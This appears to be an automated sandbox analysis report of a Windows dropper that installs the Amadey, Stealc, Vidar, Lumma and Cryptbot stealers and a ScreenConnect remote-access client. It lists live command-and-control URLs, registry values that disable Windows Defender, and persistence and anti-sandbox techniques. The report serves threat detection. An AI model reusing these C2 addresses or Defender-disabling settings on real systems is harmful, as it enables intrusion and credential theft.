Analysis
-
max time kernel
149s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
19-12-2024 16:11
Static task
static1
Behavioral task
behavioral1
Sample
36113a3c12cb6d303cdf560916665146e6fb8a6f8bca8a79cce6472fbf01611c.exe
Resource
win10v2004-20241007-en
General
-
Target
36113a3c12cb6d303cdf560916665146e6fb8a6f8bca8a79cce6472fbf01611c.exe
-
Size
7.0MB
-
MD5
f53b2824aed0ae11e8dd9ef750b2fb2c
-
SHA1
b9ad0fc166c23405229f4c3e581458c807b37b58
-
SHA256
36113a3c12cb6d303cdf560916665146e6fb8a6f8bca8a79cce6472fbf01611c
-
SHA512
2572d9f33c66aea7cf08f5c30f68c1d5740ea9710e8f3e723f3ff41bde352b049cc4f4c004f604ccde870d2b3f6e6abe063364f5f8281060eb4a84d336cf7feb
-
SSDEEP
196608:XP1e4miRlgZQGWa0ddo9HjT/amRHkr27oUEB81cQ/HyE7lSHs:X84mi/sWa9HCmxd7oB8T/B7l
Malware Config
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
lumma
Extracted
stealc
stok
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Extracted
cryptbot
Signatures
-
Amadey family
-
Cryptbot family
-
Detect Vidar Stealer 3 IoCs
resource yara_rule behavioral1/files/0x000d000000023b2f-265.dat family_vidar_v7 behavioral1/memory/4528-269-0x0000000000400000-0x0000000000639000-memory.dmp family_vidar_v7 behavioral1/memory/4528-337-0x0000000000400000-0x0000000000639000-memory.dmp family_vidar_v7 -
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 4C806m.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 7d3ca92efa.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 7d3ca92efa.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 7d3ca92efa.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 7d3ca92efa.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 7d3ca92efa.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 4C806m.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 4C806m.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 4C806m.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 4C806m.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 4C806m.exe -
Stealc family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 7284 created 3000 7284 b7a1e2f349.exe 50 -
Vidar family
-
Enumerates VirtualBox registry keys 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF 9a1c193d0b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF cedb729c19.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 15 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4320ee3d91.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4C806m.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c1de1e1e88.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3Z30a.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b7a1e2f349.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1V40F8.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2q4507.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 9a1c193d0b.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 002e33e6e2.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 7d3ca92efa.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 70a82b2704.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ cedb729c19.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 6712 powershell.exe 7528 powershell.exe 8244 powershell.exe 3144 powershell.exe 3388 powershell.exe 7928 powershell.exe -
Downloads MZ/PE file
-
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (98a59bd0eed9222b)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (98a59bd0eed9222b)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=gips620.top&p=8880&s=71ab53b0-a752-4e29-a927-f54fa80db420&k=BgIAAACkAABSU0ExAAgAAAEAAQDpOwIVy34yVx7xLDnH6rBeYx7mmiLN2yQyIYdJTxYIVHOsytxx89D0YKoH68EoEXToTuDpMmwJb%2bhrlJ3faNFTpvu7W8w3%2fxYUdeWuXWg%2bTQxXr6EWby912nykdroWfBxDx6Lmxg1gxGgRJHC8Oc96zV%2fiaqo5GlyagtszKkrbPOWW4FBVQPXhlUfH4mlFE0i0vcMxGginTYl8IjGBzr94ANeAXwajoe9Cjam2haoL%2f%2bgHMtFYBZJisALFnyX3zECpRv7vqWzNAQJYIqY6qDuC2lEbs0NtuBMSfQRW1t0ZOk7cEzuQjq72QbWf1bR8rZf%2b0t3VNSgkIUcBljvpSRK7&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAr3enNPAhkUuG52MNvdQztwAAAAACAAAAAAAQZgAAAAEAACAAAACXC4PLvgxoAPRz%2bLjk9ns3Agq8rsKfs7C7GtMZq7JL%2bgAAAAAOgAAAAAIAACAAAAA04mRIzvTYvEtcsKn528OUlqMwooJJ8Q5Tnrw%2fctqDZKAEAAAOfd9Nu4rQu6nfnZoH4J82xTFp7dhU96Gkr3QrjSVO2PDHf5l2Q6VuzwVUHPIzLs%2bFMC2TLhuSO2LtDC8Jh1MMAi9HUadkG44AgQRbPKEWh7Eloc%2bEiAWgxl44osiHubWuZje%2bbfWZpV1obC3%2bFfQiKCFW8153MQFKJ2jefpyaJHCOMo5onxIFhLq81KsGKqCeOzYgV40oKeEUIYBAO4r0X8IpmdRySeN%2fsLeQpfPWy5UvhZO6VVmz6Es0udFnneEuNRHA1Yh%2fFlRTv%2fo3iSCvUUd%2bc%2fVi7VX%2b6FyaVekFy6hYCh7JjIKyiEnch3sBsli%2bjyv1xlHbre0d7gXn4TwIGrfbTcwFjx1iosq8ll4EmrfvfiqUM0RUBINj1Eoh8V601TAav3ZU7kx6kZaZBsFyL57z%2fttktd6PLAfUetqvqtp%2bR2kOuTFcrXl5kxJ3tFb99gpWkH7dNdIinv4KqcE9IL4XwqvwK0TZnzc86nkz9Yy8HAeUsBgBG7OVzaJP3p4%2fbrC%2f50F7t2fr0hYRqqix%2fvD%2fZjnC3Pyr3Dhbq5vMmVjE6KPpn8ZhRdUuhrOQDqulPQYnjVvd8LXRlMZJMuY5aCoKALcOIWnxrE1kXvacA4aQgTNfVpzlqhiKkz4DfRZwNsIrS1FOANUvtXFVDVF%2bA%2f4Sq4oLI2V8B8JMRPvjfOT6J70lWob%2f85l1%2fqnSYWs6k%2f%2bbwcp43bXkKSr6woeXJj8BaFVGuP%2bc296gHXWuGmm9oR6ZRX5pInlgUBaR4zeqj1BcuDMEoh8vx%2fRuyq1RCC7s%2fj%2fm4FUiBaKkkXxbb8a7JMYB%2fX04BhecreziznM0zI%2bD0u0GRpXECIUAxqEl1RQhYXUnJdJs%2b%2bQc2sDrq7rRPjnYt6zsLCImNwc5BBa77mzUyvoZNYg1JuNitqjuwrXmBFYhbtQuQP0sbGHd7qE9%2f56u67tD5UwSz4T0RXwYNxZ6TH3SZyoxt3NPkWS0lLZre0WsZc8j4fz6MqvHtLhcu0432OcR8eV6MmILy6uwdK7vQV%2f0IZyFbwsDlzszUlAHI1Zj2hJOotLRxEdL%2f45zqWd7yMK%2bKyNnZXFI16evo4qqXzSruF9SE3x2y1cKV1ezNCcY%2fjkgZ5DJxIs12zZ9fN4yiuttvTU84mspNs5ssw%2fi0IWkq4o%2fSW%2f%2bVKhXa99naPX0igCHP1xZonqn%2fx9nCxyAk7dedt0mBtRfhdBwMOXU0UX2pj%2f0zBdCmAn93rIU%2fmlzP9VaTezK7FtL5wpAAyavMyEswA%2ba4nAXL1dL4ovKbZqZvVr%2f03Xnb%2fsicrP%2fDYE549%2fbZm2PJm0uS6cv0uZPygOfrQA4IwCPKrbT%2bn%2bxuPsoNGX7O4PB%2bzNwPXE2zAofwO43bnpjdDMoaKRtPrP6FHDjzI79k4T89JvAdPoZppc6ZOvIo%2baDtQ7iCH6fsq0y9k%2bdueGFn5k8GzYxUZEKUjCth44Mh42iwo37CS%2fk1qk7swpLIbAoO1nnm9T9fjpxzjppA%2fh%2fLIxDCxH3H63fQzs%2fM0FbAJu0IaP2jDXZDtWJsUYPz74%2f6rcMsDFlpoNvwhwFiX38z2wAGkAAAADE50g4UmVmTLMLv47k3B9i1eXg3Mg%2b%2bQGfnBMtDe9JXFShA5I7snDvCqlqIsexGhD8ZMuEMoL2kVSa1hkUDhjd&c=VIRUS101&c=https%3a%2f%2ft.me%2fvirus101Screenconnect&c=PC%20RAT&c=PC%20RAT&c=&c=&c=&c=\"" ScreenConnect.ClientService.exe -
Checks BIOS information in registry 2 TTPs 30 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4320ee3d91.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cedb729c19.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2q4507.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2q4507.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4C806m.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 002e33e6e2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9a1c193d0b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4320ee3d91.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7d3ca92efa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c1de1e1e88.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b7a1e2f349.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3Z30a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9a1c193d0b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 70a82b2704.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1V40F8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1V40F8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3Z30a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4C806m.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b7a1e2f349.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7d3ca92efa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 70a82b2704.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cedb729c19.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 002e33e6e2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c1de1e1e88.exe -
Checks computer location settings 2 TTPs 11 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation NN9Dd7c.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation 595994f5cc9c4c769929b462827bc67e.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation 00f883d031.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation ga70pjP.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation cfb5c42bfd.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation 716b2bf6d0ea4bc89dd192d17a90ce2f.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation bbfa9a48763748409ab9f84a4b4d1cca.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation 1048c089ab.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation 1V40F8.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation 244e0736f6f94ca18cd319153573a00b.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 53 IoCs
pid Process 3952 p6D27.exe 2356 R5B56.exe 2140 1V40F8.exe 556 skotes.exe 2332 2q4507.exe 1412 3Z30a.exe 1704 kz8ZdyP.exe 2336 4C806m.exe 2284 NN9Dd7c.exe 2012 ga70pjP.exe 4224 57dcd7e51c.exe 4528 595994f5cc9c4c769929b462827bc67e.exe 5076 244e0736f6f94ca18cd319153573a00b.exe 1316 kz8ZdyP.exe 400 kz8ZdyP.exe 7384 9a1c193d0b.exe 6264 ScreenConnect.ClientService.exe 7224 ScreenConnect.WindowsClient.exe 7512 ScreenConnect.WindowsClient.exe 7652 57dcd7e51c.exe 7008 00f883d031.exe 5704 skotes.exe 392 7z.exe 3476 7z.exe 5200 7z.exe 5564 7z.exe 7280 7z.exe 6592 7z.exe 5384 7z.exe 4464 7z.exe 8124 in.exe 6380 002e33e6e2.exe 5960 4320ee3d91.exe 5676 64711675d3.exe 7872 7d3ca92efa.exe 5028 ScreenConnect.WindowsClient.exe 6452 cfb5c42bfd.exe 7768 bbfa9a48763748409ab9f84a4b4d1cca.exe 5464 716b2bf6d0ea4bc89dd192d17a90ce2f.exe 1952 fd4b71514b.exe 7036 70a82b2704.exe 1996 cedb729c19.exe 2992 fire.exe 8376 fire.exe 8680 e200e74b60.exe 7720 e200e74b60.exe 6360 c1de1e1e88.exe 5620 skotes.exe 7284 b7a1e2f349.exe 8080 fd4b71514b.exe 7800 Intel_PTT_EK_Recertification.exe 7588 1048c089ab.exe 9456 3dbe003be11c428091b74912c836eb73.exe -
Identifies Wine through registry keys 2 TTPs 15 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine 2q4507.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine 9a1c193d0b.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine 7d3ca92efa.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine c1de1e1e88.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine 1V40F8.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine 002e33e6e2.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine 4320ee3d91.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine cedb729c19.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine 70a82b2704.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine b7a1e2f349.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine 3Z30a.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine 4C806m.exe -
Loads dropped DLL 30 IoCs
pid Process 1292 MsiExec.exe 2832 rundll32.exe 2832 rundll32.exe 2832 rundll32.exe 2832 rundll32.exe 2832 rundll32.exe 2832 rundll32.exe 2832 rundll32.exe 2832 rundll32.exe 2832 rundll32.exe 5356 MsiExec.exe 7008 MsiExec.exe 6264 ScreenConnect.ClientService.exe 6264 ScreenConnect.ClientService.exe 6264 ScreenConnect.ClientService.exe 6264 ScreenConnect.ClientService.exe 6264 ScreenConnect.ClientService.exe 6264 ScreenConnect.ClientService.exe 6264 ScreenConnect.ClientService.exe 6264 ScreenConnect.ClientService.exe 6264 ScreenConnect.ClientService.exe 6264 ScreenConnect.ClientService.exe 392 7z.exe 3476 7z.exe 5200 7z.exe 5564 7z.exe 7280 7z.exe 6592 7z.exe 5384 7z.exe 4464 7z.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 4C806m.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 4C806m.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 7d3ca92efa.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 36113a3c12cb6d303cdf560916665146e6fb8a6f8bca8a79cce6472fbf01611c.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" p6D27.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" R5B56.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\002e33e6e2.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1017718001\\002e33e6e2.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4320ee3d91.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1017719001\\4320ee3d91.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\64711675d3.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1017720001\\64711675d3.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7d3ca92efa.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1017721001\\7d3ca92efa.exe" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Y: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
flow ioc 266 raw.githubusercontent.com 267 raw.githubusercontent.com 398 raw.githubusercontent.com 57 raw.githubusercontent.com 58 raw.githubusercontent.com 59 raw.githubusercontent.com -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0008000000023d3e-5002.dat autoit_exe -
Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs
Suspicious Windows Authentication Registry Modification.
description ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800390038006100350039006200640030006500650064003900320032003200620029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 msiexec.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (98a59bd0eed9222b)\u2lphl4j.tmp ScreenConnect.ClientService.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (98a59bd0eed9222b)\u2lphl4j.newcfg ScreenConnect.ClientService.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log ScreenConnect.WindowsClient.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 17 IoCs
pid Process 2140 1V40F8.exe 556 skotes.exe 2332 2q4507.exe 1412 3Z30a.exe 2336 4C806m.exe 7384 9a1c193d0b.exe 5704 skotes.exe 6380 002e33e6e2.exe 5960 4320ee3d91.exe 7872 7d3ca92efa.exe 7036 70a82b2704.exe 1996 cedb729c19.exe 6360 c1de1e1e88.exe 5620 skotes.exe 7284 b7a1e2f349.exe 9456 3dbe003be11c428091b74912c836eb73.exe 9456 3dbe003be11c428091b74912c836eb73.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 1704 set thread context of 400 1704 kz8ZdyP.exe 141 PID 4224 set thread context of 7652 4224 57dcd7e51c.exe 161 PID 8680 set thread context of 7720 8680 e200e74b60.exe 265 PID 1952 set thread context of 8080 1952 fd4b71514b.exe 270 PID 7800 set thread context of 5848 7800 Intel_PTT_EK_Recertification.exe 273 -
resource yara_rule behavioral1/memory/8124-4951-0x00007FF6D7900000-0x00007FF6D7D90000-memory.dmp upx behavioral1/memory/8124-4966-0x00007FF6D7900000-0x00007FF6D7D90000-memory.dmp upx -
Drops file in Program Files directory 19 IoCs
description ioc Process File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.Core.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsFileManager.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\Client.en-US.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\Client.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\system.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.Windows.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsAuthenticationPackage.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsCredentialProvider.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\Client.Override.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\app.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\Client.Override.en-US.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.Client.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.ClientService.dll 